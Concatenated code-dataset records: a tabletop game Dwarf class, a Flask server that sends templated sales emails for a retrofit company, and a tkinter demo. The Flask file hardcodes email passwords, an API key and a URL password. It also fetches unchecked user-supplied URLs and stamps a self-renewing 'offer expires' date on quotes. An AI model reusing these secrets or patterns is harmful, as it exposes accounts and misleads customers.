abilityScoreIncrease(self):\n stats = self.getStats()\n print(\"Your Constitution score increases by 2.\")\n con = stats.getStat(\"constitution\")\n con.setScore(con.getScore() + 2)\n stats.setStat(con)\n if(super().getSubrace() == \"hill\"):\n print(\"Your Wisdom score increases by 1.\")\n wis = stats.getStat(\"wisdom\")\n wis.setScore(wis.getScore() + 1)\n stats.setStat(wis)\n elif(super().getSubrace() == \"mountain\"):\n print(\"Your Strength score increases by 2\")\n strength = stats.getStat(\"strength\")\n strength.setScore(strength.getScore() + 2)\n stats.setStat(strength)\n super().setStats(stats)\n\n#//----------// //----------// //----------//\n# Print methods:\n# These methods will print out all of the\n# variables.\n#//----------// //----------// //----------//\n def printRace(self, printStats: bool):\n super().printRace(printStats)\n print(\"Darkvision:\", self.getDarkvision())\n\n#//----------// //----------// //----------//\n# Check methods:\n# These methods will give a boolean value.\n#//----------// //----------// //----------//\n def checkAge(self, age: int) -> int:\n if(age < 0):\n print(\"You are too young. Setting age to 50.\")\n return 50\n elif(age > 350):\n print(\"You are too old. Setting age to 350.\")\n return 350\n else:\n return age\n\n # checks that the dwarf is at least medium hight\n # which is 48 in to 96 ft\n def checkHeight(self, height: int) -> bool:\n if(height >= 48 and height <= 96):\n return True\n else:\n return False\n\n def checkSubrace(self, subrace: str) -> bool:\n subrace = subrace\n if(subrace == \"hill\" or subrace == \"mountain\"):\n return True\n else:\n return False\n\n\n#//----------// //----------// //----------//\n# Get and Set methods\n#//----------// //----------// //----------//\n def getAge(self) -> int:\n age = self.checkAge(self.age)\n if(age == self.age):\n return age\n else:\n self.setAge(age)\n return age\n\n def setAge(self, age: int):\n age = self.checkAge(age)\n self.age = age\n\n def getDarkvision(self) -> int:\n return self.darkvision\n\n def setDarkvision(self, darkvision:int):\n if(darkvision > 60):\n self.darkvision = darkvision\n\n def getHeight(self) -> int:\n if(not self.checkHeight(48)):\n self.setHeight(48)\n return self.height\n\n def setHeight(self, height: int):\n if(self.checkHeight(height)):\n super().setHeight(height)\n else:\n print(\"Height not a medium creature. A dwarf is a medium creature between 4 ft and 5 ft, but medium creatures are between 4 ft and 8 ft\")\n super().setHeight(48)\n\n def getSubrace(self) -> str:\n if(self.checkSubrace(self.subrace)):\n return self.subrace\n else:\n self.setSubrace(\"hill\")\n return self.subrace\n\n def setSubrace(self, subrace: str):\n if(self.checkSubrace(subrace)):\n subrace = \"hill\"\n self.subrace = subrace\n\n#//----------// //----------// //----------//\n# Main Class\n#//----------// //----------// //----------//\n","sub_path":"Server/Races/Dwarf.py","file_name":"Dwarf.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"249854654","text":"from __future__ import print_function\nfrom apiclient.discovery import build\nfrom apiclient import errors\n\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\nimport urllib\n\n\nimport logging\nlogging.basicConfig()\n\n\nfrom flask import *\nimport json\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.application import MIMEApplication\nfrom email.mime.image import MIMEImage\nfrom apiclient.http import MediaIoBaseDownload\nfrom werkzeug import secure_filename\nfrom flask_cors import CORS\nimport io\nimport time, datetime\nimport shutil\nimport re\nimport os\nimport requests, calendar\nfrom apscheduler.scheduler import Scheduler\nfrom pytz import timezone\nimport pytz\nfrom io import BytesIO\n\npath = os.path.dirname(__file__)\n# modify this to change the Template Directory\n\napp = Flask(__name__)\nCORS(app)\n\"\"\"\"Schedular\"\"\"\nsched = Scheduler() # Scheduler object\nsched.start()\n\n\n# final 6/30/18\n\ndef getfilenamebyId(service, file_id):\n try:\n file = service.files().get(fileId=file_id).execute()\n if file['mimeType'] == 'application/vnd.google-apps.folder':\n return \"\"\n else:\n return file['title']\n except:\n pass\n return \"\"\n\n\n# final 6/30/18\n\ndef download(service, fileIds, prefix):\n fileNames = []\n for id in fileIds:\n result = getfilenamebyId(service, id)\n if result != \"\":\n name = prefix + \"/\" + result\n fileNames.append(name)\n req = service.files().get_media(fileId=id)\n fh = io.FileIO(name, 'w')\n downloader = MediaIoBaseDownload(fh, req)\n done = False\n try:\n while done is False:\n status, done = downloader.next_chunk()\n except Exception as inst:\n return \"Failed in downloading html file. please check fileId again\"\n fh.close()\n return fileNames\n\n\n# final 6/30/18\n\nclass EmailTemplate():\n def __init__(self, template_name='', values={}, html=True):\n self.template_name = template_name\n self.values = values\n self.html = html\n\n def render(self):\n content = open(self.template_name).read()\n\n for k, v in self.values.items():\n content = content.replace('[%s]' % k, v)\n return content\n\n\n# final 6/30/18\n\nclass MailMessage(object):\n html = False\n\n def __init__(self, from_email='', to_emails=[], cc_emails=[], reply_to=[], subject='', body='', qattachment='',\n template=None, templatefiles=[], attachments=[]):\n self.from_email = from_email\n self.reply_to = reply_to\n self.to_emails = to_emails\n self.cc_emails = cc_emails\n self.subject = subject\n self.template = template\n self.body = body\n self.file_attachments = attachments\n self.templatefiles = templatefiles\n self.qattachment = qattachment\n\n def attach_file(self, path):\n self.file_attachments.append(path)\n\n def get_message(self):\n if isinstance(self.to_emails, str):\n self.to_emails = [self.to_emails]\n\n if isinstance(self.reply_to, str):\n self.reply_to = [self.reply_to]\n\n if isinstance(self.cc_emails, str):\n self.cc_emails = [self.cc_emails]\n\n if isinstance(self.qattachment, str):\n self.qattachment = [self.qattachment]\n\n if len(self.to_emails) == 0 or self.from_email == '':\n raise ValueError('Invalid From or To email address(es)')\n\n msg = MIMEMultipart('alternative')\n # msg = MIMEMultipart('multipart/mixed')\n msg['To'] = ', '.join(self.to_emails)\n msg['Reply-to'] = ', '.join(self.reply_to)\n msg['Cc'] = ', '.join(self.cc_emails)\n msg['From'] = self.from_email\n msg['Subject'] = self.subject\n\n msgAlternative = MIMEMultipart('mixed')\n msg.attach(msgAlternative)\n\n msgText = MIMEText('This is the alternative plain text message.')\n msgAlternative.attach(msgText)\n\n if self.template:\n if self.template.html:\n msgAlternative.attach(MIMEText(self.template.render(), 'html'))\n else:\n msgAlternative.attach(MIMEText(self.template.render(), 'plain'))\n else:\n msgAlternative.attach(MIMEText(self.body, 'plain'))\n\n for file in self.templatefiles:\n # ORIG with open(attachment, \"rb\") as f:\n # ORIGfilename = os.path.basename(attachment)\n fp = open(file, 'rb')\n msgImage = MIMEImage(fp.read())\n fp.close()\n cids = file.split(\"/\")\n cid = cids[len(cids) - 1]\n msgImage.add_header('Content-ID', '<' + cid + '>')\n msgImage.add_header('Content-Disposition', 'inline', filename=os.path.basename(file))\n msg.attach(msgImage)\n\n for attachment in self.file_attachments:\n with open(attachment, \"rb\") as f:\n filename = os.path.basename(attachment)\n part = MIMEApplication(f.read(), Name=filename)\n part['Content-Disposition'] = 'attachment; filename=\"' + str(filename) + '\"'\n msg.attach(part)\n try:\n if self.qattachment != \"\" and os.path.exists(self.qattachment):\n with open(self.qattachment, \"rb\") as f:\n filename = os.path.basename(self.qattachment)\n part = MIMEApplication(f.read(), Name=filename)\n part['Content-Disposition'] = 'attachment; filename=\"' + str(filename) + '\"'\n msg.attach(part)\n except:\n pass\n # ORIG part = MIMEApplication(f.read(), Name=filename)\n # ORIG part['Content-Disposition'] = 'attachment; filename=\"' + str(filename) + '\"'\n # ORIG msg.attach(part)\n return msg\n\n\n# final 6/30/18\n\nclass MailServer(object):\n msg = None\n\n def __init__(self, server_name='smtp.gmail.com', username='', password='', port=587,\n require_starttls=True):\n self.server_name = server_name\n self.username = username\n self.password = password\n self.port = port\n self.require_starttls = require_starttls\n\n\n# final 6/30/18\n\ndef send(mail_msg, mail_server=MailServer()):\n server = smtplib.SMTP(mail_server.server_name, mail_server.port)\n if mail_server.require_starttls:\n server.starttls()\n if mail_server.username:\n server.login(mail_server.username, mail_server.password)\n\n server.sendmail(mail_msg.from_email, (mail_msg.to_emails + mail_msg.cc_emails), mail_msg.get_message().as_string())\n server.close()\n\n\n# final 6/30/18\n\ndef getConnection():\n SCOPES = 'https://www.googleapis.com/auth/drive'\n store = file.Storage(path + '/credentials.json')\n creds = store.get()\n\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets(path + '/client_secret.json', SCOPES)\n creds = tools.run_flow(flow, store)\n\n service = build('drive', 'v2', http=creds.authorize(Http()))\n return service\n\n\n# final 6/30/18\n\ndef get_files_in_folder(service, folder_id):\n \"\"\"Print files belonging to a folder.\n\n Args:\n service: Drive API service instance.\n folder_id: ID of the folder to print files from.\n \"\"\"\n page_token = None\n file_ids = []\n while True:\n try:\n param = {}\n if page_token:\n param['pageToken'] = page_token\n children = service.children().list(\n folderId=folder_id, **param).execute()\n\n for child in children.get('items', []):\n file_ids.append(child['id'])\n page_token = children.get('nextPageToken')\n if not page_token:\n break\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n break\n\n return file_ids\n\n\n# final 6/30/18\ndef get_fileNames_in_folder(service, folder_id):\n \"\"\"Print files belonging to a folder.\n\n Args:\n service: Drive API service instance.\n folder_id: ID of the folder to print files from.\n \"\"\"\n page_token = None\n file_ids = []\n while True:\n try:\n param = {}\n if page_token:\n param['pageToken'] = page_token\n # children = service.children().list(\n # folderId=folder_id, **param).execute()\n query = \"'{}' in parents\".format(folder_id)\n children = service.files().list(\n q=query, fields='nextPageToken, files(id, name)').execute()\n return children\n for child in children.get('items', []):\n return child\n file_ids.append(child['name'])\n page_token = children.get('nextPageToken')\n if not page_token:\n break\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n break\n return file_ids\n\n\n# final 6/30/18\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n# NOTfinal 6/30/18\n\n@app.route('/sendEmail', methods=['POST'])\ndef sendEmail():\n if request.method == 'POST':\n ############## Get params from request ###############\n ## reply_to : destination email\n ## file_id : email file id of google drive %% You can get file id using this end point \"ec2-18-216-179-182.us-east-2.compute.amazonaws.com/fileList\"\n ## subject : Subject of Email\n ## attachment : attach file params\n ## address : Address information\n ## price : Price param\n ## name : Name param\n #######################################################\n\n if 'msg[Reply_to]' in request.form:\n Reply_to = request.form['msg[Reply_to]']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'msg[Reply_to]'\"})\n\n if 'msg[To]' in request.form:\n Email_To = request.form['msg[To]']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'msg[To]'\"})\n\n templateID_folder = \"\"\n if 'templateID_folder' in request.form:\n templateID_folder = request.form['templateID_folder']\n\n if 'attachFiles' not in request.form:\n return json.dumps({\"error\": \"Failed! Missing parameter 'templateID_folder' or 'attachFiles'\"})\n\n if 'address' in request.form:\n address = request.form['address']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'address'\"})\n\n if 'price' in request.form:\n price = request.form['price']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'price'\"})\n\n if 'name' in request.form:\n name = request.form['name']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'name'\"})\n\n templateID = \"\"\n if 'templateID' in request.form:\n templateID = request.form['templateID']\n elif 'template' not in request.files:\n return json.dumps({\"error\": \"No template or templateID found!\"})\n\n if 'subject' in request.form:\n subject = request.form['subject']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'subject'\"})\n\n prefix = path + \"/uploads/\" + str(int(round(time.time() * 1000)))\n if not os.path.exists(prefix):\n os.makedirs(prefix)\n os.makedirs(prefix + \"/attachments\")\n\n if 'template' in request.files:\n uploadfile = request.files.getlist(\"template\")\n for file in uploadfile:\n templateFileName = os.path.join(prefix + \"/\", secure_filename(file.filename))\n file.save(templateFileName)\n\n attachFileNames = []\n if 'attachFiles' in request.files:\n uploadsFiles = request.files.getlist(\"attachFiles\")\n for file in uploadsFiles:\n fileName = os.path.join(prefix + \"/\", secure_filename(file.filename))\n attachFileNames.append(fileName)\n file.save(fileName)\n\n ## get instance of connection for google drive\n service = getConnection()\n\n if templateID != \"\":\n templateFileName = prefix + \"/email.html\"\n ## download file which id is file_id and save as \"email.html\"\n req = service.files().get_media(fileId=templateID)\n fh = io.FileIO(templateFileName, 'w')\n downloader = MediaIoBaseDownload(fh, req)\n\n done = False\n try:\n while done is False:\n status, done = downloader.next_chunk()\n except Exception as inst:\n return json.dumps({\"error\": \"Failed in downloading html file. please check fileId again\"})\n fh.close()\n ### download attached files\n # templateID_folder = \"1Tnw9ShNslKIwt7awqxQQ7Awva7rMXE3T\"\n if templateID_folder != \"\":\n fileIds = get_files_in_folder(service, templateID_folder)\n attachFileNames = download(service, fileIds, prefix + \"/attachments\")\n\n ## Define values which are needed to exchange with email text.\n values = {}\n # values['username'] = 'mail@gmail.com'\n # values['from'] = 'mail@gmail.com'\n # values['url'] = ''\n femail = 'ashley@la-retrofit.com'\n femailp = 'TempPass123456@'\n # femail='matt.engineering79@gmail.com'\n if '@la-retrofit.com' in femail:\n servern = 'smtp.office365.com'\n port_ = 587\n if '@gmail.com' in femail:\n servern = 'smtp.gmail.com'\n port_ = 587\n\n ## Sending email to Email_To\n temp = EmailTemplate(template_name=templateFileName, values=values)\n server = MailServer(server_name=servern, username=femail,\n password=femailp,\n port=port_, require_starttls=True)\n msg = MailMessage(from_email=femail, to_emails=[Email_To], reply_to=[Reply_to], subject=subject, template=temp,\n attachments=attachFileNames)\n send(mail_msg=msg, mail_server=server)\n\n ## delete downloaded files\n # os.remove(templateFileName)\n # for name in attachFileNames:\n # if (os.path.exists(name)):\n # os.remove(name)\n # shutil.rmtree(prefix)\n # return json.dumps({\"success\": \"sent email to 2 \" + Email_to})\n\n\n# final 6/30/18\n## Get file list of google drive\n@app.route('/fileList')\ndef fileList():\n # Setup the Drive v2 API\n service = getConnection()\n print(\"here\")\n result = []\n page_token = None\n while True:\n try:\n param = {}\n if page_token:\n param['pageToken'] = page_token\n files = service.files().list(**param).execute()\n\n result.extend(files['items'])\n page_token = files.get('nextPageToken')\n if not page_token:\n break\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n break\n return json.dumps({'lists': result})\n\n #\n # # Call the Drive v2 API\n # results = service.files().list(\n # fields=\"nextPageToken, files(id, name)\").execute()\n # items = results.get('files', [])\n # if not items:\n # return \"File Not Found\"\n # else:\n # return json.dumps({'lists': items})\n\n\n# final 6/30/18\n# rest api to send email\n@app.route('/restApi', methods=['POST'])\ndef uploads():\n if request.method == 'POST':\n # MAIN MAIN\n ############## Get params from request ###############\n ## reply_to : destination email\n ## file_id : email file id of google drive %% You can get file id using this end point \"ec2-18-216-179-182.us-east-2.compute.amazonaws.com/fileList\"\n ## subject : Subject of Email\n ## attachment : attach file params\n ## address : Address information\n ## price : Price param\n ## name : Name param\n #######################################################\n\n if 'msg[Reply_to]' in request.form:\n Reply_to = request.form['msg[Reply_to]']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'msg[Reply_to]'\"})\n\n if 'msg[To]' in request.form:\n Email_To = request.form['msg[To]']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'msg[To]'\"})\n\n Email_CC = ''\n if 'msg[CC]' in request.form:\n Email_CC = request.form['msg[CC]']\n\n templateID_folder = \"\"\n if 'templateID_folder' in request.form:\n templateID_folder = request.form['templateID_folder']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'templateID_folder'\"})\n\n if 'attachFiles' in request.form:\n attachFiles = request.form['attachFiles'];\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'templateID_folder' or 'attachFiles'\"})\n\n if 'address' in request.form:\n address = request.form['address']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'address'\"})\n\n if 'price' in request.form:\n price = request.form['price']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'price'\"})\n\n if 'name' in request.form:\n name = request.form['name']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'name'\"})\n\n quote = 0\n if 'quote' in request.form:\n quote = int(request.form['quote'])\n else:\n quote = 0\n\n prclim = \"\"\n if 'prclim' in request.form:\n prclim = request.form['prclim']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'prclim'\"})\n\n templateID = \"\"\n if 'templateID' in request.form:\n templateID = request.form['templateID']\n elif 'template' not in request.files:\n return json.dumps({\"error\": \"No template or templateID found!\"})\n\n if 'subject' in request.form:\n subject = request.form['subject']\n else:\n return json.dumps({\"error\": \"Failed! Missing parameter 'subject'\"})\n\n \"\"\"finddeadline, deadline, fadr, remaining\"\"\"\"\"\"\"\"\"\n finddeadline = 0\n if 'finddeadline' in request.form:\n finddeadline = request.form['finddeadline']\n\n \"\"\"prefix\"\"\"\n prefix = path + \"/uploads/\" + str(int(round(time.time() * 1000)))\n if not os.path.exists(prefix):\n os.makedirs(prefix)\n\n directattach = 0\n if 'directattach' in request.form:\n directattach = request.form['directattach']\n else:\n directattach = ''\n\n ### download attached files\n service = getConnection()\n fileIds = attachFiles.replace(\" \", \"\")\n fileIds = fileIds.split(\",\")\n attachFileNames = download(service, fileIds, prefix)\n if directattach != '':\n dattachs = directattach.split(\",\")\n for da in dattachs:\n tmp = da.rfind('/')\n fnm = da[tmp + 1:]\n if \"http\" not in da.lower():\n da = da.replace('www.', 'http://www.')\n qr = requests.get(da, stream=True)\n qname = prefix + \"/\" + fnm\n fl = open(path + \"/testfile2.txt\", \"a+\")\n fl.write(da + \"\\n\" + fnm + \"\\n\" + qname + \"\\n\")\n fl.close()\n with open(qname, \"wb\") as fl:\n for chunk in qr.iter_content(chunk_size=128):\n if chunk:\n fl.write(chunk)\n # REPLACES THE CONTENT OF EMAIL\n if os.path.isfile(qname):\n attachFileNames.append(qname)\n\n # attachFileNames = []\n # if 'attachFiles' in request.files:\n # uploadsFiles = request.files.getlist(\"attachFiles\")\n # for file in uploadsFiles:\n # fileName = os.path.join(prefix + \"/\", secure_filename(file.filename))\n # attachFileNames.append(fileName)\n # file.save(fileName)\n # fl = open(path+\"/testfile2.txt\",\"a+\")\n # fl.write(fileName+\"\\n\")\n # fl.close()\n\n textfile = open(path + \"/queue.txt\", 'a')\n content = {\"Reply_to\": Reply_to, \"Email_To\": Email_To, \"templateID_folder\": templateID_folder,\n \"templateID\": templateID, \"address\": address, \"price\": price, \"name\": name, \"subject\": subject,\n \"finddeadline\": finddeadline, \"attachFileNames\": attachFileNames,\n \"recieve_time\": datetime.datetime.now().replace(microsecond=0).strftime('%m/%d/%Y-%H:%M:%S'),\n \"prclim\": prclim, \"quote\": quote, \"Email_CC\": Email_CC}\n textfile.write(json.dumps(content) + '\\n')\n textfile.close()\n return json.dumps({\"success\": \"will send email to MAIN \" + Email_To})\n # EmailSendingUint(Reply_to=Reply_to, Email_To=Email_To, templateID_folder=templateID_folder, templateID=templateID, address=address, price=price,name=name, subject=subject,finddeadline=finddeadline,attachFileNames=attachFileNames)\n\n\n\"\"\"Email Send Unit for CronJob\"\"\"\n\n\ndef EmailSendingUint(prclim, Reply_to, Email_To, templateID_folder, templateID, address, price, name, subject,\n finddeadline, quote, Email_CC, attachFileNames=[]):\n \"\"\"finddeadline, deadline, fulladdress, remaining\"\"\"\"\"\"\"\"\"\n remaining = 0\n fadr = \"\"\n clock = \"\"\n\n if finddeadline == '1' and address != \"\":\n url = \"http://www.la-retrofit.com/getDEADLINE/index.php?address=\" + address\n r = requests.get(url)\n data = str(r.content).split('
')\n deadline = \"\"\n fl = open(path + \"/testfile.txt\", \"w\")\n fl.write(finddeadline + \"\\n\")\n fl.close()\n\n try:\n permit = data[0]\n deadline = data[1]\n fadr = data[2]\n\n except:\n pass\n if deadline != \"\":\n obj = datetime.datetime.strptime(deadline, \"%m/%d/%Y\")\n today = datetime.datetime.now().replace(hour=0).replace(minute=0).replace(second=0).replace(\n microsecond=0)\n obj = obj.replace(year=obj.year + 2)\n remaining = (obj - today).days\n clock = ''\n\n \"\"\"date_\"\"\"\"\"\"\"\"\"\n today = datetime.datetime.now(tz=pytz.utc)\n today = today.astimezone(timezone('US/Pacific'))\n day = today.day\n lastday = calendar.monthrange(today.year, today.month)[1]\n if day > int(lastday / 2):\n date_ = str(today.month) + \"/\" + str(lastday) + \"/\" + str(today.year)\n else:\n date_ = str(today.month) + \"/\" + str(int(lastday / 2)) + \"/\" + str(today.year)\n prclim = \"$1500.0 Discount Already Applied - OFFER EXPIRES \" + date_\n\n \"\"\"prefix\"\"\"\n prefix = path + \"/uploads/\" + str(int(round(time.time() * 1000)))\n if not os.path.exists(prefix):\n os.makedirs(prefix)\n os.makedirs(prefix + \"/attachments\")\n\n ## get instance of connection for google drive\n service = getConnection()\n\n if templateID != \"\":\n templateFileName = prefix + \"/email.html\"\n ## download file which id is file_id and save as \"email.html\"\n req = service.files().get_media(fileId=templateID)\n fh = io.FileIO(templateFileName, 'w')\n downloader = MediaIoBaseDownload(fh, req)\n\n done = False\n try:\n while done is False:\n status, done = downloader.next_chunk()\n except Exception as inst:\n return json.dumps({\"error\": \"Failed in downloading html file. please check fileId again\"})\n fh.close()\n ## Define values which are needed to exchange with email text.\n values = {}\n\n ## Sending email to reply_to\n femail = 'honestdev21@gmail.com'\n femailp = 'ahgifrhehdejd'\n # femail = 'honestdev21@gmail.com'\n # femailp = 'ahgifrhehdejd'\n if '@la-retrofit.com' in femail:\n servern = 'smtp.office365.com'\n port_ = 587\n if '@gmail.com' in femail:\n servern = 'smtp.gmail.com'\n port_ = 587\n\n temp = EmailTemplate(template_name=templateFileName, values=values)\n temp_ = str(temp.render())\n # Fixing Unknown Characters\n\n # rep_ = r'windows-1252'\n # temp_ = unicode(temp_, \"u\")\n temp_ = re.sub(r'[^\\x00-\\x7F]+', ' ', temp_)\n # temp_=temp_.decode('utf-8')\n # GET FULL ADDRESS\n wds = address.split(\" \")\n address = str.join('+', wds)\n url = 'https://maps.googleapis.com/maps/api/geocode/json?&key=AIzaSyAKUsjQYamRqDL8przA2r4msj_ppgCe80A&address=' + address + \"+Los+ANGELES,CA,USA\"\n resp = urllib.urlopen(url)\n jraw = resp.read()\n jdata = json.loads(jraw)\n if jdata['status'] == 'OK':\n result = jdata['results'][0]\n fadr = result['formatted_address']\n fadr_ = result['formatted_address']\n else:\n return \"error\"\n\n # download QUOTE\n qname = \"\"\n if quote == 1:\n qurl = \"http://www.la-retrofit.com/action_page.php?password=laretrofit1&address=\" + fadr + \"&price=\" + price + \"&retainer1=60&retainer2=30&time=10&prclim=\" + prclim;\n qr = requests.get(qurl, stream=True)\n qname = prefix + \"/LA-Retrofit-Quote-\" + fadr.replace(\" \", \"_\").replace(\".\", \"_\").replace(\",\", \"_\") + \".pdf\"\n qname = qname.replace(\"__\", \"_\")\n with open(qname, \"wb\") as pdf:\n for chunk in qr.iter_content(chunk_size=1024):\n if chunk:\n pdf.write(chunk)\n # REPLACES THE CONTENT OF EMAIL\n if os.path.isfile(qname):\n qname = qname\n else:\n qname = \"\"\n\n temp_ = temp_.replace(\"Hi ,\", \"Hi \" + name + \",\")\n temp2 = \"BUILDING 1 Address:
\" + fadr\n temp_ = temp_.replace(\"BUILDING 1 Address:\", temp2)\n\n # find the deadline\n bad = 0\n if finddeadline == '1' and clock != \"\":\n if (\"west hollywood\" not in fadr.lower()) and (\"santa monica\" not in fadr.lower()) and (\n \"beverly hills\" not in fadr.lower()):\n temp_ = temp_.replace('%DEADLINE%',\n ' ' + str(remaining) + ' ')\n else:\n bad = 1\n else:\n bad = 1\n if bad == 1:\n temp_ = temp_.replace('%DEADLINE%', '')\n temp_ = temp_.replace('DAYS LEFT TO CITY DEADLINE FOR YOUR PROPERTY', '')\n bad = 0\n\n if (prclim == ''):\n temp_ = temp_.replace(\"%PRICE%\", '$' + price);\n else:\n temp_ = temp_.replace(\"%PRICE%\", '$' + price + ' (' + prclim + ')');\n\n regex = r']+src=\\\"([^\\\">]+)'\n srcs = re.findall(regex, str(temp_))\n xn = 0\n imgn = []\n imgo = []\n src_ = ''\n for src in srcs:\n xn = xn + 1\n bi = src.rfind('/') # index of backslash\n if bi >= 0:\n n = len(src)\n imgn.append(src[bi + 1:])\n imgo.append(src)\n temp_ = temp_.replace(src, 'cid:' + src[bi + 1:])\n\n regex = r']+src=\\\"([^\\\">]+)'\n srcs = re.findall(regex, str(temp_))\n src_ = ''\n for src in srcs:\n xn = xn + 1\n bi = src.rfind('/') # index of backslash\n if bi >= 0:\n n = len(src)\n imgn.append(src[bi + 1:])\n imgo.append(src)\n temp_ = temp_.replace(src, 'cid:' + src[bi + 1:])\n\n # fix bad style\n # temp_=temp_.replace(\"if gte vml 1\",'if gte vml 1000')\n\n textfile = open(prefix + \"/email2.html\", 'w')\n textfile.write(temp_)\n textfile.close()\n values = {}\n temp = EmailTemplate(template_name=prefix + \"/email2.html\", values=values)\n ### download attached files\n # templateID_folder = \"1Tnw9ShNslKIwt7awqxQQ7Awva7rMXE3T\"\n # ONLY UPLOAD IMAGES\n templatefiles = []\n if templateID_folder != \"\":\n src_ = ''\n fileIds = get_files_in_folder(service, templateID_folder)\n FileNames = []\n for fileId_ in fileIds:\n file_ = service.files().get(fileId=fileId_).execute()\n FileName = file_['title']\n FileName = FileName.lower()\n FileNames.append(FileName)\n\n ext = ['.gif', '.png', '.jpeg', '.jpg', '.jpeg']\n xn = 0\n fids = []\n fnd = 0\n for FileName in FileNames:\n FileName = FileName.lower()\n xn = xn + 1\n if any(x in FileName for x in ext):\n if any(x in FileName for x in imgn):\n fnd = 1\n fids.append(fileIds[xn - 1])\n if fnd > 0:\n templatefiles = download(service, fids, prefix + \"/attachments\")\n\n server = MailServer(server_name=servern, username=femail,\n password=femailp,\n port=port_, require_starttls=True)\n # lets fix template file by replacing the\n # import lxml.html as LH\n # root = LH.fromstring(str(temp))\n # for el in root.iter('img'):\n # for ii in range(xn):\n # if el.attrib['src']==imgo[ii]:\n # el.attrib['src'] = img[ii]\n #\n # temp=root\n fsubject = subject + ' - ' + fadr_\n\n msg = MailMessage(from_email=femail, to_emails=[Email_To], reply_to=[Reply_to], subject=fsubject, template=temp,\n templatefiles=templatefiles, attachments=attachFileNames, qattachment=qname, cc_emails=[Email_CC])\n\n send(mail_msg=msg, mail_server=server)\n\n ###delete downloaded files\n # os.remove(templateFileName)\n # for name in attachFileNames:\n # if (os.path.exists(name)):\n # os.remove(name)\n # shutil.rmtree(prefix)\n if len(attachFileNames) > 0:\n folder = attachFileNames[0].split(\"/\")\n foldername = folder[len(folder) - 2]\n # shutil.rmtree(path + \"/uploads/\" + foldername)\n content = {\"Email_CC\": Email_CC, \"Reply_to\": Reply_to, \"Email_To\": Email_To, \"templateID_folder\": templateID_folder,\n \"templateID\": templateID, \"address\": address, \"price\": price, \"name\": name, \"subject\": subject,\n \"finddeadline\": finddeadline, \"attachFileNames\": attachFileNames,\n \"sent_time\": datetime.datetime.now().replace(microsecond=0).strftime('%m/%d/%Y-%H:%M:%S')}\n textfile = open(path + \"/log.txt\", 'a')\n textfile.write(json.dumps(content) + '

')\n textfile.close()\n print (\"sent email already\")\n return json.dumps({\"success\": \"sent email to MAIN \" + Email_To})\n\n\n\"\"\"Cron Job\"\"\"\n\n\ndef cronJob():\n print (\"here\")\n lines = open(path + \"/queue.txt\", 'r').readlines()\n data = {}\n flag = 0\n remaining = \"\"\n for line in lines:\n if flag == 0:\n data = json.loads(line)\n flag = 1\n print(data)\n else:\n remaining += line\n f = open(path + \"/queue.txt\", \"w\")\n f.write(remaining)\n f.close()\n if data != {}:\n EmailSendingUint(Reply_to=data['Reply_to'], Email_To=data['Email_To'],\n templateID_folder=data['templateID_folder'], templateID=data['templateID'],\n address=data['address'], price=data['price']\n , name=data['name'], subject=data['subject'], finddeadline=data['finddeadline'],\n attachFileNames=data['attachFileNames'], prclim=data['prclim'], quote=data['quote'],\n Email_CC=data['Email_CC'])\n\n\n@app.route('/email_queue')\ndef email_queue():\n lines = open(path + \"/queue.txt\").readlines()\n data = \"\"\n for line in lines:\n data += line + \"

\"\n return data\n\n\n@app.route('/email_log')\ndef email_log():\n data = open(path + \"/log.txt\", \"r\").read()\n return data\n\n\n# add your job here\nsched.add_interval_job(cronJob, seconds=10)\nif __name__ == '__main__':\n app.run()\n\n\n","sub_path":"flaskapp2.py","file_name":"flaskapp2.py","file_ext":"py","file_size_in_byte":32495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"49759666","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\n\n# Create the root window\nroot = tk.Tk()\nroot.title('tkinter testing')\n\n# Create a fram with some padding\nframe = ttk.Frame(root)\nframe['padding'] = (5)\n\n# Buttons\nbutton1 = ttk.Button(frame, text='Cancel')\nbutton2 = ttk.Button(frame, text='OK')\n\n# Check box\ncheckbtn_onoff = ttk.Checkbutton(frame, text='On or off')\n\n# Entry boxes and their labels.\nlabel1 = ttk.Label(frame, text=\"Username:\")\nlabel2 = ttk.Label(frame, text=\"Location:\")\n\n# username = tk.StringVar()\n# location = tk.StringVar()\nentry_name = ttk.Entry(frame)\nentry_location = ttk.Entry(frame)\n\n\n# occupation = tk.StringVar()\ncombo_occupation = ttk.Combobox(frame)\ncombo_occupation['values'] = ['Policeman', 'Fireman', 'Astronaut', 'Computer Science Teacher']\n# combo_occupation['state'] = 'readonly'\n# combo_occupation.current(0)\n# combo_occupation.bind('<>', lambda e: combo_occupation.selection_clear())\n\n\n# Place the frame in the root's grid\nframe.grid(column=0, row=0, sticky='swen')\n\n# Place all the other widgets in the frame\nlabel1.grid(row=0, column=0, sticky='w')\nlabel2.grid(row=1, column=0, sticky='w')\nbutton1.grid(column=1, row=3, sticky='ne')\nbutton2.grid(column=2, row=3, sticky='ne')\ncheckbtn_onoff.grid(column=2, row = 2, sticky='n')\nentry_name.grid(column=1, row=0, columnspan=2, sticky='ew')\nentry_location.grid(column=1, row=1, columnspan=2, 